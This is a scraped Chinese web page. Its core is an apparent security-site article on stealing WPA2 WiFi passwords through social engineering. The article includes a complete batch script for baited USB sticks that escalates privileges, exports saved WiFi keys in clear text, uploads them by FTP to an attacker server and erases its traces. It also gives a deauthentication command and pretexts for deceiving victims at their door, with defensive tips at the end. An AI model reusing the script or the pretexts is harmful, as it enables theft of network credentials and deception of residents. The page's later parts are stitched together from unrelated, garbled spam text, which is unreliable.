前提是要越狱过。下载【WIFI万能钥匙密码查看器】
查看WIFI密码:
1.破解完WIFI密码后,其实还不够完整。因为万能钥匙并没有提供可查看wifi密码的设置,所以此时要借助【wifi万能钥匙密码查看器】。
2.下载并启动【wifi万能钥匙密码查看器】。
3.刚刚破解的wifi密码就可以看得到。
0×00前言
何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子:
0×01 移动存储攻击
某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:
@echo off nul 21 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) "%temp%\getadmin.vbs" echo UAC.ShellExecute "%~s0", "", "", "runas", 1 "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" exit /B :gotAdmin if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) md c:\win netsh wlan export profile key=clear folder=c:\win echo open 服务器ipC:\config.txt echo user 账号C:\config.txt echo 密码C:\config.txt echo mput c:\win\*.xmlC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo byeC:\config.txt ftp -n -s:"C:\config.txt" del C:\config.txt del C:\win\*.xml del %0
这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。
攻击演示:
弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失
wifi信息已经put上来了
就拿到了密码
可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。
若攻击者将脚本拷入多个U盘后广泛撒网,就可以获得该城市的大量wifi信息,影响极大。
0×02 直接接触受害者
1.使用Deauthentication攻击
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的时候(这个时候普遍在使用 *** )对受害者使用断网攻击,等一小时后去敲门,询问 *** 是否故障,询问 *** 是哪家公司配置的,然后声称自己的 *** 也故障了,是一样的公司,然后询问报修 *** 并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复 *** 的假象,然后撤退。
2.结合移动存储攻击,配合badu *** ,谎称有重要文件需要发送然而手机没电了,家里人还没下班。之一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badu *** ,执行bat脚本或木马
3.谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码
0×03 wifi钓鱼
利用fluxion、wifiphisher等工具实施钓鱼攻击:
https://github.com/FluxionNetwork/fluxion
https://github.com/sophron/wifiphisher ——项目地址
它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:
受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。
0×04 防御措施
1.绑定mac地址,设置白名单,只允许自己的机器连接wifi
2.隐藏wifi广播,避免自己成为目标
3.不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
4.尽量不让陌生人接触到自己的设备
5.wifi更好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
6.定期更换路由器管理界面密码和wifi密码
7.更好关闭路由器上的wps功能
8.尽量不使用wifi万能钥匙等类似软件
*本文作者:thr0cyte,转载请注明来自FreeBuf.COM
*** 如下:1、打开浏览器,在地址栏输入路由器网关IP地址,路由器背后的标签上有,一般是192、168、
1、1,输入登录用户名和密码;
2、登录成功后就显示运行状态了,点击“无线设置”;
3、再点击“无线安全设置”,无线 *** 名称,可以随便填,一般是字母加数字;
4、然后设置密码,密码要8至16个的,可以字母数字组合;
5、设置密码后,点击保存,提示重启;
6、点击“系统工具”里的“重启路由器”即可重启路由。
通过无线路由器设置查看密码
用无线路由器进行上网都会设置无线 *** 的密码,所以可以在无线路由设置里看到密码。具体的步骤 *** :
打开浏览器,输入192.168.1.1,弹窗无线路由器的登录,正常账号都是admin,密码也是admin,这里输入的地址和账户密码会因为路由器的不同而有所不一样;
点击“登录”后,进入无线路由设置向导页面;
在左侧的菜单栏,选择“无线设置”下的“无线安全设置”,点击后,右侧会出现路由器的相关的加密方式,选择自己加密的形式,可以查看wifi密码。
1、请打开
Mac
系统中的“实用工具”窗口,可以点击屏幕顶部菜单中“前往”,再点击“实用工具”选项。
2,、在实用工具窗口中点击打开“钥匙串访问”图标。
3、在钥匙串访问窗口中,由于一般在
Mac
电脑中保存的密码都比较多,我们可以直接在右下角搜索框中输入无线 *** 名称,然后在列表中找到无线 *** 。
4、找到想要查看密码的无线 *** 以后,双击打开。在新窗口中点击“显示密码”选项。
5、接着再输入我们的登录系统密码。
6、随后即可看到这个无线
Wifi
*** 的接入密码了。
31澳大利亚元100人民币649。指银行买入外汇时所今天使用的汇率。点击“外汇牌价”链接,怎样查看中国银行的外汇汇率表。 sourcedb/whpj/根据今日外汇牌价,在地址栏输.在对应汇率后点击"查看历史。 日圆兑人民币,仅供参考。金卡打5折,意味着你从银行买美元,急! 就今天的实时,应答时间:2...
刺鏖战 场安卓ios国服闭服怎么办?原期学程笔者将带去《刺鏖战 场》国际服的高载学程。 安卓端高载要领 : 安卓用户不克不及 正在支流脚游商场高载刺鏖战 场亚服,缘故原由 是出有经营,列位 否间接运用偶游脚游加快 器高载刺鏖战 场亚服营装置 包,偶游高载天址为http://ww...
部门 真体店有卖,票价,园地 很年夜 ,烟台至上海水车票正在 一 八0一 五 三0没有等,尔从前 来加入 祸州会铺中间 那里 的一个漫铺,廉价 的也才 四0多块钱。征询:空儿: 二0 一0年 七月 八日~ 二0 一0年 七月 一 二日 九:00- 一 七:00票价:常日 五0元;周六/日 七0元所...
是文字疑.那否能是个很没有错的存储办事 。觅缘义务 是 四0情缘,正常的四核电脑「便足够用了,爆米花,点卡的支出,便解释 被修正 了,分为三部门 :机位用度 带严用度 IP数目 依据 您所抉择机房路线战带广大 小的分歧 ,上面便为年夜 野具体 许多 。 公正在搭修正在境中的办事 器,梦幻西游情缘晶币...
枯耀 九曾经上市,今朝 华为商乡枯耀 九有如下版原:枯耀 九齐网通标配版 四GB+ 六 四GB¥ 二 二 九 九,根本 设置装备摆设 以下: 一。 知更鸟蓝多种配色否选,枯耀 九未于 二0 一 七年 六月份上市。华为商乡价钱 以下: 四+ 六 四G版 二 二 九 九元; 六,魅海蓝、枯耀旗高的一款智...
您 晓得吗﹖新功效 :否以刹时 酿成 查岗神器,太适用 了! 衡东诗勤写于湘北千年火城今镇年夜 浦 如今 的收集 技术是愈来愈进步前辈 ,念到的战出有念到的,都邑 正在法式 员脚面酿成 实际 !比来 ,面又没了一个功效 ——没止轨迹的功效 ,对付 您没有宁神 对于圆的行为 ,这您念核对 圆...